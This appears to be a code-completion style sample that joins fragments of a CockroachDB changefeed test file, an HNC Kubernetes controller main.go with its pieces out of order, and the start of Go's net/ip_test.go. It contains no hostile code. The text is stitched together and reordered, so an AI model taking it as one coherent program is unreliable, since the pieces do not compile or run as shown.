sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT)`)
var id0 int
sqlDB.QueryRow(t, `INSERT INTO foo VALUES (0) RETURNING rowid`).Scan(&id0)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
var id1 int
sqlDB.QueryRow(t, `INSERT INTO foo VALUES (1) RETURNING rowid`).Scan(&id1)
assertPayloads(t, foo, []string{
fmt.Sprintf(`foo: [%d]->{"after": {"a": 0, "rowid": %d}}`, id0, id0),
fmt.Sprintf(`foo: [%d]->{"after": {"a": 1, "rowid": %d}}`, id1, id1),
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
// TestChangefeedNodeShutdown ensures that an enterprise changefeed continues
// running after the original job-coordinator node is shut down.
func TestChangefeedNodeShutdown(t *testing.T) {
defer leaktest.AfterTest(t)()
t.Skip("#32232")
defer func(oldInterval time.Duration) {
jobs.DefaultAdoptInterval = oldInterval
}(jobs.DefaultAdoptInterval)
jobs.DefaultAdoptInterval = 100 * time.Millisecond
flushCh := make(chan struct{}, 1)
defer close(flushCh)
knobs := base.TestingKnobs{DistSQL: &execinfra.TestingKnobs{Changefeed: &TestingKnobs{
AfterSinkFlush: func() error {
select {
case flushCh <- struct{}{}:
default:
}
return nil
},
}}}
tc := serverutils.StartTestCluster(t, 3, base.TestClusterArgs{
ServerArgs: base.TestServerArgs{
UseDatabase: "d",
Knobs: knobs,
},
})
defer tc.Stopper().Stop(context.Background())
db := tc.ServerConn(1)
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `SET CLUSTER SETTING changefeed.experimental_poll_interval = '0ns'`)
sqlDB.Exec(t, `CREATE DATABASE d`)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'initial')`)
// Create a factory which uses server 1 as the output of the Sink, but
// executes the CREATE CHANGEFEED statement on server 0.
sink, cleanup := sqlutils.PGUrl(
t, tc.Server(0).ServingSQLAddr(), t.Name(), url.User(security.RootUser))
defer cleanup()
f := cdctest.MakeTableFeedFactory(tc.Server(1), tc.ServerConn(0), flushCh, sink)
foo := feed(t, f, "CREATE CHANGEFEED FOR foo")
defer closeFeed(t, foo)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'second')`)
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "initial"}}`,
`foo: [1]->{"after": {"a": 1, "b": "second"}}`,
})
// TODO(mrtracy): At this point we need to wait for a resolved timestamp,
// in order to ensure that there isn't a repeat when the job is picked up
// again. As an alternative, we could use a verifier instead of assertPayloads.
// Wait for the high-water mark on the job to be updated after the initial
// scan, to make sure we don't get the initial scan data again.
// Stop server 0, which is where the table feed connects.
tc.StopServer(0)
sqlDB.Exec(t, `UPSERT INTO foo VALUES(0, 'updated')`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (3, 'third')`)
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "updated"}}`,
`foo: [3]->{"after": {"a": 3, "b": "third"}}`,
})
}
func TestChangefeedTelemetry(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1)`)
sqlDB.Exec(t, `CREATE TABLE bar (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO bar VALUES (1)`)
// Reset the counts.
_ = telemetry.GetFeatureCounts(telemetry.Raw, telemetry.ResetCounts)
// Start some feeds (and read from them to make sure they've started.
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
fooBar := feed(t, f, `CREATE CHANGEFEED FOR foo, bar WITH format=json`)
defer closeFeed(t, fooBar)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1}}`,
})
assertPayloads(t, fooBar, []string{
`bar: [1]->{"after": {"a": 1}}`,
`foo: [1]->{"after": {"a": 1}}`,
})
var expectedSink string
if strings.Contains(t.Name(), `sinkless`) || strings.Contains(t.Name(), `poller`) {
expectedSink = `sinkless`
} else {
expectedSink = `experimental-sql`
}
counts := telemetry.GetFeatureCounts(telemetry.Raw, telemetry.ResetCounts)
require.Equal(t, int32(2), counts[`changefeed.create.sink.`+expectedSink])
require.Equal(t, int32(2), counts[`changefeed.create.format.json`])
require.Equal(t, int32(1), counts[`changefeed.create.num_tables.1`])
require.Equal(t, int32(1), counts[`changefeed.create.num_tables.2`])
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedMemBufferCapacity(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
// The RowContainer used internally by the memBuffer seems to request from
// the budget in 10240 chunks. Set this number high enough for one but not
// for a second. I'd love to be able to derive this from constants, but I
// don't see how to do that without a refactor.
knobs.MemBufferCapacity = 20000
beforeEmitRowCh := make(chan struct{}, 1)
knobs.BeforeEmitRow = func(ctx context.Context) error {
select {
case <-ctx.Done():
return ctx.Err()
case <-beforeEmitRowCh:
}
return nil
}
defer close(beforeEmitRowCh)
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'small')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
// Small amounts of data fit in the buffer.
beforeEmitRowCh <- struct{}{}
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "small"}}`,
})
// Put enough data in to overflow the buffer and verify that at some point
// we get the "memory budget exceeded" error.
sqlDB.Exec(t, `INSERT INTO foo SELECT i, 'foofoofoo' FROM generate_series(1, $1) AS g(i)`, 1000)
if _, err := foo.Next(); !testutils.IsError(err, `memory budget exceeded`) {
t.Fatalf(`expected "memory budget exceeded" error got: %v`, err)
}
}
// The mem buffer is only used with RangeFeed.
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
// Regression test for #41694.
func TestChangefeedRestartDuringBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
defer func(i time.Duration) { jobs.DefaultAdoptInterval = i }(jobs.DefaultAdoptInterval)
jobs.DefaultAdoptInterval = 10 * time.Millisecond
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
knobs := f.Server().(*server.TestServer).Cfg.TestingKnobs.
DistSQL.(*execinfra.TestingKnobs).
Changefeed.(*TestingKnobs)
beforeEmitRowCh := make(chan error, 20)
knobs.BeforeEmitRow = func(ctx context.Context) error {
select {
case <-ctx.Done():
return ctx.Err()
case err := <-beforeEmitRowCh:
return err
}
}
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0), (1), (2), (3)`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH diff`).(*cdctest.TableFeed)
defer closeFeed(t, foo)
// TODO(dan): At a high level, all we're doing is trying to restart a
// changefeed in the middle of changefeed backfill after a schema change
// finishes. It turns out this is pretty hard to do with our current testing
// knobs and this test ends up being pretty brittle. I'd love it if anyone
// thought of a better way to do this.
// Read the initial data in the rows.
for i := 0; i < 4; i++ {
beforeEmitRowCh <- nil
}
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0}, "before": null}`,
`foo: [1]->{"after": {"a": 1}, "before": null}`,
`foo: [2]->{"after": {"a": 2}, "before": null}`,
`foo: [3]->{"after": {"a": 3}, "before": null}`,
})
// Run a schema change that backfills kvs.
sqlDB.Exec(t, `ALTER TABLE foo ADD COLUMN b STRING DEFAULT 'backfill'`)
// Unblock emit for each kv written by the schema change's backfill. The
// changefeed actually emits these, but we lose it to overaggressive
// duplicate detection in tableFeed.
// TODO(dan): Track duplicates more precisely in tableFeed.
for i := 0; i < 4; i++ {
beforeEmitRowCh <- nil
}
// Unblock the emit for *all but one* of the rows emitted by the changefeed
// backfill (run after the schema change completes and the final table
// descriptor is written). The reason this test has 4 rows is because the
// `sqlSink` that powers `tableFeed` only flushes after it has 3 rows, so we
// need 1 more than that to guarantee that this first one gets flushed.
for i := 0; i < 3; i++ {
beforeEmitRowCh <- nil
}
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0}, "before": {"a": 0}}`,
`foo: [1]->{"after": {"a": 1}, "before": {"a": 1}}`,
`foo: [2]->{"after": {"a": 2}, "before": {"a": 2}}`,
`foo: [3]->{"after": {"a": 3}, "before": {"a": 3}}`,
`foo: [0]->{"after": {"a": 0, "b": "backfill"}, "before": {"a": 0}}`,
})
// Restart the changefeed without allowing the second row to be backfilled.
sqlDB.Exec(t, `PAUSE JOB $1`, foo.JobID)
// PAUSE JOB only requests the job to be paused. Block until it's paused.
opts := retry.Options{
InitialBackoff: 1 * time.Millisecond,
MaxBackoff: time.Second,
Multiplier: 2,
}
ctx := context.Background()
if err := retry.WithMaxAttempts(ctx, opts, 10, func() error {
var status string
sqlDB.QueryRow(t, `SELECT status FROM system.jobs WHERE id = $1`, foo.JobID).Scan(&status)
if jobs.Status(status) != jobs.StatusPaused {
return errors.New("could not pause job")
}
return nil
}); err != nil {
t.Fatal(err)
}
// Make extra sure that the zombie changefeed can't write any more data.
beforeEmitRowCh <- MarkRetryableError(errors.New(`nope don't write it`))
// Insert some data that we should only see out of the changefeed after it
// re-runs the backfill.
sqlDB.Exec(t, `INSERT INTO foo VALUES (6, 'bar')`)
// Unblock all later emits, we don't need this control anymore.
close(beforeEmitRowCh)
// Resume the changefeed and the backfill should start up again. Currently
// this does the entire backfill again, you could imagine in the future that
// we do some sort of backfill checkpointing and start the backfill up from
// the last checkpoint.
sqlDB.Exec(t, `RESUME JOB $1`, foo.JobID)
assertPayloads(t, foo, []string{
// The changefeed actually emits this row, but we lose it to
// overaggressive duplicate detection in tableFeed.
// TODO(dan): Track duplicates more precisely in sinklessFeed/tableFeed.
// `foo: [0]->{"after": {"a": 0, "b": "backfill"}}`,
`foo: [1]->{"after": {"a": 1, "b": "backfill"}, "before": {"a": 1}}`,
`foo: [2]->{"after": {"a": 2, "b": "backfill"}, "before": {"a": 2}}`,
`foo: [3]->{"after": {"a": 3, "b": "backfill"}, "before": {"a": 3}}`,
})
assertPayloads(t, foo, []string{
`foo: [6]->{"after": {"a": 6, "b": "bar"}, "before": null}`,
})
}
// Only the enterprise version uses jobs.
t.Run(`enterprise`, enterpriseTest(testFn))
}
| TestChangefeedResolvedFrequency |
main.go | /*
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package main
import (
"errors"
"flag"
"net/http"
"os"
"strings"
"contrib.go.opencensus.io/exporter/prometheus"
"contrib.go.opencensus.io/exporter/stackdriver"
"github.com/go-logr/zapr"
corev1 "k8s.io/api/core/v1"
// Change to use v1 when we only need to support 1.17 and higher kubernetes versions.
stdzap "go.uber.org/zap"
"go.uber.org/zap/zapcore"
apiextensions "k8s.io/apiextensions-apiserver/pkg/apis/apiextensions/v1"
"k8s.io/apimachinery/pkg/runtime"
clientgoscheme "k8s.io/client-go/kubernetes/scheme"
_ "k8s.io/client-go/plugin/pkg/client/auth/gcp"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/healthz"
"sigs.k8s.io/controller-runtime/pkg/log/zap"
"sigs.k8s.io/controller-runtime/pkg/metrics"
// +kubebuilder:scaffold:imports
v1a2 "sigs.k8s.io/hierarchical-namespaces/api/v1alpha2"
"sigs.k8s.io/hierarchical-namespaces/internal/config"
"sigs.k8s.io/hierarchical-namespaces/internal/forest"
"sigs.k8s.io/hierarchical-namespaces/internal/setup"
"sigs.k8s.io/hierarchical-namespaces/internal/stats"
)
var (
scheme = runtime.NewScheme()
setupLog = zap.New().WithName("setup")
)
var (
probeAddr string
metricsAddr string
enableStackdriver bool
maxReconciles int
enableLeaderElection bool
leaderElectionId string
noWebhooks bool
debugLogs bool
testLog bool
internalCert bool
qps int
webhookServerPort int
restartOnSecretRefresh bool
unpropagatedAnnotations arrayArg
excludedNamespaces arrayArg
managedNamespaceLabels arrayArg
managedNamespaceAnnots arrayArg
includedNamespacesRegex string
webhooksOnly bool
)
// init preloads some global vars before main() starts. Since this is the top-level module, I'm not
// sure what happens _between_ init() and main() but this is the way kubebuilder left things so I'm
// going to leave it alone.
func init() {
setupLog.Info("Starting main.go:init()")
defer setupLog.Info("Finished main.go:init()")
_ = clientgoscheme.AddToScheme(scheme)
_ = v1a2.AddToScheme(scheme)
_ = corev1.AddToScheme(scheme)
_ = apiextensions.AddToScheme(scheme)
// +kubebuilder:scaffold:scheme
}
func main() {
parseFlags()
metricsCleanupFn := enableMetrics()
defer metricsCleanupFn()
mgr := createManager()
// Make sure certs are managed if requested. In webhooks-only mode, we don't run the manager, and
// rely on either a controller running in a different HNC deployment, or an external tool such as
// cert-manager.
certsReady := make(chan struct{})
if internalCert && !webhooksOnly {
setupLog.Info("Starting certificate generation")
err := setup.ManageCerts(mgr, certsReady, restartOnSecretRefresh)
if err != nil {
setupLog.Error(err, "unable to set up cert rotation")
os.Exit(1)
}
} else {
close(certsReady)
}
setupProbeEndpoints(mgr, certsReady)
// The call to mgr.Start will never return, but the certs won't be ready until the manager starts
// and we can't set up the webhooks without them (the webhook server runnable will try to read the
// certs, and if those certs don't exist, the entire process will exit). So start a goroutine
// which will wait until the certs are ready, and then create the rest of the HNC controllers.
go startControllers(mgr, certsReady)
setupLog.Info("Starting manager")
if err := mgr.Start(ctrl.SetupSignalHandler()); err != nil {
setupLog.Error(err, "problem running manager")
os.Exit(1)
}
}
func parseFlags() {
setupLog.Info("Parsing flags")
flag.StringVar(&probeAddr, "health-probe-bind-address", ":8081", "The address the probe endpoint binds to.")
flag.StringVar(&metricsAddr, "metrics-addr", ":8080", "The address the metric endpoint binds to.")
flag.BoolVar(&enableStackdriver, "enable-stackdriver", true, "If true, export metrics to stackdriver")
flag.BoolVar(&enableLeaderElection, "enable-leader-election", false,
"Enable leader election for controller manager. Enabling this will ensure there is only one active controller manager.")
flag.StringVar(&leaderElectionId, "leader-election-id", "controller-leader-election-helper",
"Leader election id determines the name of the configmap that leader election will use for holding the leader lock.")
flag.BoolVar(&noWebhooks, "no-webhooks", false, "Disables webhooks")
flag.BoolVar(&debugLogs, "debug-logs", false, "Shows verbose logs.")
flag.BoolVar(&testLog, "enable-test-log", false, "Enables test log.")
flag.BoolVar(&internalCert, "enable-internal-cert-management", false, "Enables internal cert management. See the user guide for more information.")
flag.IntVar(&maxReconciles, "max-reconciles", 1, "Number of concurrent reconciles to perform.")
flag.IntVar(&qps, "apiserver-qps-throttle", 50, "The maximum QPS to the API server. See the user guide for more information.")
flag.BoolVar(&stats.SuppressObjectTags, "suppress-object-tags", true, "If true, suppresses the kinds of object metrics to reduce metric cardinality. See the user guide for more information.")
flag.IntVar(&webhookServerPort, "webhook-server-port", 443, "The port that the webhook server serves at.")
flag.Var(&unpropagatedAnnotations, "unpropagated-annotation", "An annotation that, if present, will be stripped out of any propagated copies of an object. May be specified multiple times, with each instance specifying one annotation. See the user guide for more information.")
flag.Var(&excludedNamespaces, "excluded-namespace", "A namespace that, if present, will be excluded from HNC management. May be specified multiple times, with each instance specifying one namespace. See the user guide for more information.")
flag.StringVar(&includedNamespacesRegex, "included-namespace-regex", ".*", "Namespace regular expression. Namespaces that match this regexp will be included and handle by HNC. The regex is implicitly wrapped by \"^...$\" and may only be specified once.")
flag.BoolVar(&restartOnSecretRefresh, "cert-restart-on-secret-refresh", false, "Kills the process when secrets are refreshed so that the pod can be restarted (secrets take up to 60s to be updated by running pods)")
flag.Var(&managedNamespaceLabels, "managed-namespace-label", "A regex indicating the labels on namespaces that are managed by HNC. These labels may only be set via the HierarchyConfiguration object. All regexes are implictly wrapped by \"^...$\". This argument can be specified multiple times. See the user guide for more information.")
flag.Var(&managedNamespaceAnnots, "managed-namespace-annotation", "A regex indicating the annotations on namespaces that are managed by HNC. These annotations may only be set via the HierarchyConfiguration object. All regexes are implictly wrapped by \"^...$\". This argument can be specified multiple times. See the user guide for more information.")
flag.BoolVar(&webhooksOnly, "webhooks-only", false, "Disables the controllers so HNC can be run in HA webhook mode")
flag.Parse()
// Assign the array args to the configuration variables after the args are parsed.
config.UnpropagatedAnnotations = unpropagatedAnnotations
config.SetNamespaces(includedNamespacesRegex, excludedNamespaces...)
if err := config.SetManagedMeta(managedNamespaceLabels, managedNamespaceAnnots); err != nil {
setupLog.Error(err, "Illegal flag values")
os.Exit(1)
}
// Basic legality checks
if webhooksOnly && noWebhooks {
setupLog.Info("Cannot set both --webhooks-only and --no-webhooks")
os.Exit(1)
}
}
// enableMetrics returns a function to call from main() to export any remaining metrics when main()
// is exiting.
func enableMetrics() func() {
var cleanupFn func()
// Enable OpenCensus exporters to export metrics
// to Stackdriver Monitoring.
// Exporters use Application Default Credentials to authenticate.
// See https://developers.google.com/identity/protocols/application-default-credentials
// for more details.
if enableStackdriver {
setupLog.Info("Creating OpenCensus->Stackdriver exporter")
sd, err := stackdriver.NewExporter(stackdriver.Options{
// Stackdriver’s minimum stats reporting period must be >= 60 seconds.
// https://opencensus.io/exporters/supported-exporters/go/stackdriver/
ReportingInterval: stats.ReportingInterval,
})
if err == nil {
err = sd.StartMetricsExporter()
if err == nil {
cleanupFn = func() {
// Flush must be called before main() exits to ensure metrics are recorded.
sd.Flush()
sd.StopMetricsExporter()
}
}
}
if err != nil {
setupLog.Error(err, "Could not create Stackdriver exporter")
}
}
// Hook up OpenCensus to Prometheus.
//
// Creating a prom/oc exporter automatically registers the exporter with Prometheus; we can ignore
// the returned value since it doesn't do anything anyway. See:
// (https://github.com/census-ecosystem/opencensus-go-exporter-prometheus/blob/2b9ada237b532c09fcb0a1242469827bdb89df41/prometheus.go#L103)
setupLog.Info("Creating Prometheus exporter")
_, err := prometheus.NewExporter(prometheus.Options{
Registerer: metrics.Registry, // use the controller-runtime registry to merge with all other metrics
})
if err != nil {
setupLog.Error(err, "Could not create Prometheus exporter")
}
return cleanupFn
}
func createManager() ctrl.Manager {
| // setupProbeEndpoints registers the health endpoints
func setupProbeEndpoints(mgr ctrl.Manager, certsReady chan struct{}) {
// We can't use the default checker directly, since the checker assumes that the webhook server
// has been started, and it will error out (and crash HNC) if the certs don't exist yet.
// Therefore, this thin wrapper checks whether the certs are ready, and if so, bypasses the
// controller-manager checker.
checker := func(req *http.Request) error {
select {
case <-certsReady:
return mgr.GetWebhookServer().StartedChecker()(req)
default:
return errors.New("HNC internal certs are not yet ready")
}
}
// If we're not running the webhooks, no point checking to see if they're up.
if noWebhooks {
checker = healthz.Ping
}
if err := mgr.AddHealthzCheck("healthz", checker); err != nil {
setupLog.Error(err, "unable to set up health check")
os.Exit(1)
}
if err := mgr.AddReadyzCheck("readyz", checker); err != nil {
setupLog.Error(err, "unable to set up ready check")
os.Exit(1)
}
setupLog.Info("Probe endpoints are configured on healthz and readyz")
}
func startControllers(mgr ctrl.Manager, certsReady chan struct{}) {
// The controllers won't work until the webhooks are operating, and those won't work until the
// certs are all in place.
setupLog.Info("Waiting for certificate generation to complete")
<-certsReady
setupLog.Info("Certs ready")
if testLog {
stats.StartLoggingActivity()
}
// Create the central in-memory data structure for HNC, since it needs to be shared among all
// other components.
f := forest.NewForest()
opts := setup.Options{
NoWebhooks: noWebhooks,
MaxReconciles: maxReconciles,
ReadOnly: webhooksOnly,
}
setup.Create(setupLog, mgr, f, opts)
setupLog.Info("All controllers started; setup complete")
}
// arrayArg is an arg that can be specified multiple times. It implements
// https://golang.org/pkg/flag/#Value an is based on
// https://stackoverflow.com/questions/28322997/how-to-get-a-list-of-values-into-a-flag-in-golang.
type arrayArg []string
func (a arrayArg) String() string {
return strings.Join(a, ", ")
}
func (a *arrayArg) Set(val string) error {
*a = append(*a, val)
return nil
}
| setupLog.Info("Configuring controller-manager")
logLevel := zapcore.InfoLevel
if debugLogs {
logLevel = zapcore.DebugLevel
}
// Create a raw (upstream) zap logger that we can pass to both
// the zap stdlib log redirect and logr.Logger shim we use for controller-runtime.
// Stdlib is redirected at ErrorLevel since it should only log
// if it can't return an error, like in http.Server before a handler is invoked,
// and we expect other libraries to do the same.
rawlog := zap.NewRaw(zap.Level(logLevel), zap.StacktraceLevel(zapcore.PanicLevel))
stdzap.RedirectStdLogAt(rawlog, zapcore.ErrorLevel)
log := zapr.NewLogger(rawlog)
ctrl.SetLogger(log)
cfg := ctrl.GetConfigOrDie()
cfg.QPS = float32(qps)
// By default, Burst is about 2x QPS, but since HNC's "bursts" can last for ~minutes
// we need to raise the QPS param to be much higher than we ordinarily would. As a
// result, doubling this higher threshold is probably much too high, so lower it to a more
// reasonable number.
//
// TODO: Better understand the behaviour of Burst, and consider making it equal to QPS if
// it turns out to be harmful.
cfg.Burst = int(cfg.QPS * 1.5)
mgr, err := ctrl.NewManager(cfg, ctrl.Options{
NewClient: config.NewCachingClient,
Scheme: scheme,
MetricsBindAddress: metricsAddr,
HealthProbeBindAddress: probeAddr,
LeaderElection: enableLeaderElection,
LeaderElectionID: leaderElectionId,
Port: webhookServerPort,
})
if err != nil {
setupLog.Error(err, "unable to create manager")
os.Exit(1)
}
return mgr
}
|
ip_test.go | // Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package net
import (
"bytes"
"math/rand"
"reflect"
"runtime"
"testing"
)
var parseIPTests = []struct {
in string
out IP
}{
{"127.0.1.2", IPv4(127, 0, 1, 2)},
{"127.0.0.1", IPv4(127, 0, 0, 1)},
{"127.001.002.003", IPv4(127, 1, 2, 3)},
{"::ffff:127.1.2.3", IPv4(127, 1, 2, 3)},
{"::ffff:127.001.002.003", IPv4(127, 1, 2, 3)},
{"::ffff:7f01:0203", IPv4(127, 1, 2, 3)},
{"0:0:0:0:0000:ffff:127.1.2.3", IPv4(127, 1, 2, 3)},
{"0:0:0:0:000000:ffff:127.1.2.3", IPv4(127, 1, 2, 3)},
{"0:0:0:0::ffff:127.1.2.3", IPv4(127, 1, 2, 3)},
{"2001:4860:0:2001::68", IP{0x20, 0x01, 0x48, 0x60, 0, 0, 0x20, 0x01, 0, 0, 0, 0, 0, 0, 0x00, 0x68}},
{"2001:4860:0000:2001:0000:0000:0000:0068", IP{0x20, 0x01, 0x48, 0x60, 0, 0, 0x20, 0x01, 0, 0, 0, 0, 0, 0, 0x00, 0x68}},
{"-0.0.0.0", nil},
{"0.-1.0.0", nil},
{"0.0.-2.0", nil},
{"0.0.0.-3", nil},
{"127.0.0.256", nil},
{"abc", nil},
{"123:", nil},
{"fe80::1%lo0", nil},
{"fe80::1%911", nil},
{"", nil},
{"a1:a2:a3:a4::b1:b2:b3:b4", nil}, // Issue 6628
}
func TestParseIP(t *testing.T) {
for _, tt := range parseIPTests {
if out := ParseIP(tt.in); !reflect.DeepEqual(out, tt.out) {
t.Errorf("ParseIP(%q) = %v, want %v", tt.in, out, tt.out)
}
if tt.in == "" {
// Tested in TestMarshalEmptyIP below.
continue
}
var out IP
if err := out.UnmarshalText([]byte(tt.in)); !reflect.DeepEqual(out, tt.out) || (tt.out == nil) != (err != nil) {
t.Errorf("IP.UnmarshalText(%q) = %v, %v, want %v", tt.in, out, err, tt.out)
}
}
}
func TestLookupWithIP(t *testing.T) {
_, err := LookupIP("")
if err == nil {
t.Errorf(`LookupIP("") succeeded, should fail`)
}
_, err = LookupHost("")
if err == nil {
t.Errorf(`LookupIP("") succeeded, should fail`)
}
// Test that LookupHost and LookupIP, which normally
// expect host names, work with IP addresses.
for _, tt := range parseIPTests {
if tt.out != nil {
addrs, err := LookupHost(tt.in)
if len(addrs) != 1 || addrs[0] != tt.in || err != nil {
t.Errorf("LookupHost(%q) = %v, %v, want %v, nil", tt.in, addrs, err, []string{tt.in})
}
} else if !testing.Short() {
// We can't control what the host resolver does; if it can resolve, say,
// 127.0.0.256 or fe80::1%911 or a host named 'abc', who are we to judge?
// Warn about these discrepancies but don't fail the test.
addrs, err := LookupHost(tt.in)
if err == nil {
t.Logf("warning: LookupHost(%q) = %v, want error", tt.in, addrs)
}
}
if tt.out != nil {
ips, err := LookupIP(tt.in)
if len(ips) != 1 || !reflect.DeepEqual(ips[0], tt.out) || err != nil {
t.Errorf("LookupIP(%q) = %v, %v, want %v, nil", tt.in, ips, err, []IP{tt.out})
}
} else if !testing.Short() {
ips, err := LookupIP(tt.in)
// We can't control what the host resolver does. See above.
if err == nil {
t.Logf("warning: LookupIP(%q) = %v, want error", tt.in, ips)
}
}
}
}
func BenchmarkParseIP(b *testing.B) {
testHookUninstaller.Do(uninstallTestHooks)
for i := 0; i < b.N; i++ {
for _, tt := range parseIPTests {
ParseIP(tt.in)
}
}
}
// Issue 6339
func TestMarshalEmptyIP(t *testing.T) {
for _, in := range [][]byte{nil, []byte("")} {
var out = IP{1, 2, 3, 4}
if err := out.UnmarshalText(in); err != nil || out != nil {
t.Errorf("UnmarshalText(%v) = %v, %v; want nil, nil", in, out, err)
}
}
var ip IP
got, err := ip.MarshalText()
if err != nil {
t.Fatal(err)
}
if !reflect.DeepEqual(got, []byte("")) {
t.Errorf(`got %#v, want []byte("")`, got)
}
}
var ipStringTests = []struct {
in IP // see RFC 791 and RFC 4291
str string // see RFC 791, RFC 4291 and RFC 5952
byt []byte
error
}{
// IPv4 address
{
IP{192, 0, 2, 1},
"192.0.2.1",
[]byte("192.0.2.1"),
nil,
},
{
IP{0, 0, 0, 0},
"0.0.0.0",
[]byte("0.0.0.0"),
nil,
},
// IPv4-mapped IPv6 address
{
IP{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 0, 2, 1},
"192.0.2.1",
[]byte("192.0.2.1"),
nil,
},
{
IP{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 0, 0, 0, 0},
"0.0.0.0",
[]byte("0.0.0.0"),
nil,
},
// IPv6 address
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0, 0x1, 0x23, 0, 0x12, 0, 0x1},
"2001:db8::123:12:1",
[]byte("2001:db8::123:12:1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x1},
"2001:db8::1",
[]byte("2001:db8::1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0x1, 0, 0, 0, 0x1, 0, 0, 0, 0x1},
"2001:db8:0:1:0:1:0:1",
[]byte("2001:db8:0:1:0:1:0:1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0x1, 0, 0, 0, 0x1, 0, 0, 0, 0x1, 0, 0},
"2001:db8:1:0:1:0:1:0",
[]byte("2001:db8:1:0:1:0:1:0"),
nil,
},
{
IP{0x20, 0x1, 0, 0, 0, 0, 0, 0, 0, 0x1, 0, 0, 0, 0, 0, 0x1},
"2001::1:0:0:1",
[]byte("2001::1:0:0:1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0x1, 0, 0, 0, 0, 0, 0},
"2001:db8:0:0:1::",
[]byte("2001:db8:0:0:1::"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0x1, 0, 0, 0, 0, 0, 0x1},
"2001:db8::1:0:0:1",
[]byte("2001:db8::1:0:0:1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0xa, 0, 0xb, 0, 0xc, 0, 0xd},
"2001:db8::a:b:c:d",
[]byte("2001:db8::a:b:c:d"),
nil,
},
{
IPv6unspecified,
"::",
[]byte("::"),
nil,
},
// IP wildcard equivalent address in Dial/Listen API
{
nil,
"<nil>",
nil,
nil,
},
// Opaque byte sequence
{
IP{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef},
"?0123456789abcdef",
nil,
&AddrError{Err: "invalid IP address", Addr: "0123456789abcdef"},
},
}
func TestIPString(t *testing.T) {
for _, tt := range ipStringTests {
if out := tt.in.String(); out != tt.str {
t.Errorf("IP.String(%v) = %q, want %q", tt.in, out, tt.str)
}
if out, err := tt.in.MarshalText(); !bytes.Equal(out, tt.byt) || !reflect.DeepEqual(err, tt.error) {
t.Errorf("IP.MarshalText(%v) = %v, %v, want %v, %v", tt.in, out, err, tt.byt, tt.error)
}
}
}
var sink string
func BenchmarkIPString(b *testing.B) {
testHookUninstaller.Do(uninstallTestHooks)
for i := 0; i < b.N; i++ {
for _, tt := range ipStringTests {
if tt.in != nil {
sink = tt.in.String()
}
}
}
}
var ipMaskTests = []struct {
in IP
mask IPMask
out IP
}{
{IPv4(192, 168, 1, 127), IPv4Mask(255, 255, 255, 128), IPv4(192, 168, 1, 0)},
